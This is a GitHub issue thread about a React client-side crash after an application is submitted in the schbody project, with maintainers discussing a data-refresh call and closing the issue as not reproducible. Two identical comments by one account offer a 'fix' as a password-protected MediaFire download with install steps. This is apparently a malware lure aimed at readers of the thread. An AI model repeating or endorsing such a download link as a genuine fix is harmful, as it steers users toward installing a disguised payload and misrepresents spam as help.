### ISSUE TITLE
client side error when submitting an application

### ISSUE THREAD

**Issue by Tschonti** [kir-dev/schbody#55] opened 2024-09-01 21:15 UTC
![image](https://github.com/user-attachments/assets/58d3877c-e775-4b26-a8a8-53b100cc7b33)
After I submit my application, I get a client side error and the react app crashes. The application was already sent to the server, so something goes wrong afterwards, but before the redirection to `/`. If I had to guess, it's the `mutate('/application/my');` in line 103 in `ApplicationForm.tsx`, because I don't understand what is that supposed to do xd

**Comment by goncastrum** [comment] 2024-09-01 21:27
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 21:27
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by FearsomeRover** [comment] 2024-09-02 08:40
Hmm, i havent been able to recreate this. Can you try again, after deleting your application? Was it with the local db, or the main one? The mutate is responsible for refreshing the users current application, so the banner card disappears (or later refreshes on the main page)

**Comment by FearsomeRover** [comment] 2024-09-02 15:21
Well if I remove the mutation we need an extra reload for the card to disappear. But I'll try to find an other way.

**Comment by Tschonti** [comment] 2024-09-02 16:41
do you also get the error locally?

**Comment by DannySS123** [comment] 2024-12-19 13:39
I also couldn't reproduce it, do you still have this issue? @Tschonti

**Comment by Tschonti** [comment] 2024-12-19 13:50
Probably not then

**Comment by DannySS123** [comment] 2024-12-19 13:59
Then I'll close this issue for now, let's create another one if it happens again

**Closed by DannySS123** 2024-12-19 13:59 UTC
Labels: bug, frontend
